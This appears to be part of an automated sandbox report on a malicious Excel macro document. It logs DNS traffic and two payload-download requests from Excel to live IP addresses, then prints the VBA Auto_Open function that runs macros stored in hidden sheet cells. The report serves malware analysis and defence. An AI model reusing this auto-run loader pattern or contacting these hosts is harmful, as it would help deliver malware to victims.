                                                                                                                                                    May 4, 2021 06:03:15.156810999 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:15.183433056 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:15.257983923 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:16.080308914 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:16.139619112 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:17.147382021 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:17.206713915 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:18.211606026 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:18.277544975 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:19.362761974 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:19.419728994 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:20.336002111 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:20.400949955 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:20.847661018 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:20.907320976 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:33.813786983 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:33.880697966 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:56.883594036 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:56.986828089 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:04:02.185312986 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:04:02.243391991 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:04:04.101893902 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:04:04.174412012 CEST53581778.8.8.8192.168.2.6

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 185.45.193.80
                                                                                                                                                    • 45.144.31.232

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.649720185.45.193.8080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    May 4, 2021 06:02:39.448817968 CEST1263OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 185.45.193.80
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    May 4, 2021 06:02:39.706553936 CEST1268INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 04 May 2021 04:02:39 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 548
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.64972945.144.31.23280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    May 4, 2021 06:03:01.035176039 CEST1384OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 45.144.31.232
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    May 4, 2021 06:03:01.127298117 CEST1385INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 04 May 2021 04:03:01 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 548
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 6340 Parent PID: 792

                                                                                                                                                    General

                                                                                                                                                    Start time:06:02:28
                                                                                                                                                    Start date:04/05/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x1320000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Disassembly

                                                                                                                                                    VBA Code

                                                                                                                                                    Call Graph

                                                                                                                                                    Graph

                                                                                                                                                    • Entrypoint
                                                                                                                                                    • Decryption Function
                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    • Show Help
                                                                                                                                                    callgraph 2 Auto_Open Run:3,Range:3

                                                                                                                                                    Module: Byutut

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "Byutut"

                                                                                                                                                    Executed Functions
                                                                                                                                                    Function Auto_Open, APIs: 6, Strings: 6, Number of lines: 5, Relevance: 30.005
                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Run

                                                                                                                                                    		Microsoft Excel:Application.Run()

                                                                                                                                                    Range

                                                                                                                                                    Run

                                                                                                                                                    Range

                                                                                                                                                    Run

                                                                                                                                                    Range

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "AM5"
                                                                                                                                                    "Nyukasl"
                                                                                                                                                    "A5"
                                                                                                                                                    "Nyukasl"
                                                                                                                                                    "A5"
                                                                                                                                                    "Nyukasl"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    5

                                                                                                                                                    Public Function Auto_Open()

                                                                                                                                                    7

                                                                                                                                                    Application.Run Sheets("Nyukasl").Range("AM5")

                                                                                                                                                    Microsoft Excel:Application.Run()

                                                                                                                                                    Range

                                                                                                                                                    executed
                                                                                                                                                    9

                                                                                                                                                    Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                    Run

                                                                                                                                                    Range

                                                                                                                                                    10

                                                                                                                                                    Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                    Run

                                                                                                                                                    Range

                                                                                                                                                    14

                                                                                                                                                    End Function

                                                                                                                                                    Module: Class1

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "Class1"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = False

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = False

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = False

                                                                                                                                                    Module: \x041b\x0438\x0441\x04421

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "\x041b\x0438\x0441\x04421"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                    Module: \x041b\x0438\x0441\x04422

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "\x041b\x0438\x0441\x04422"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                    Module: \x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "\x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                    Reset < >